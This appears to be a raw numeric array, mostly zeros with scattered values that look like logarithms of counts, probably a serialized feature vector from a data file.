0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.6109179126442243, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.649511027115099, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, \n 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 8.791967689147654, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.833213344056216, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.0301047650807, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.1972245773362196, 2.8398715690385097, 0.0, 0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.941642422609304, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.3862943611198906, 1.7412592803704001, 0.0, 0.0, 0, \n 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 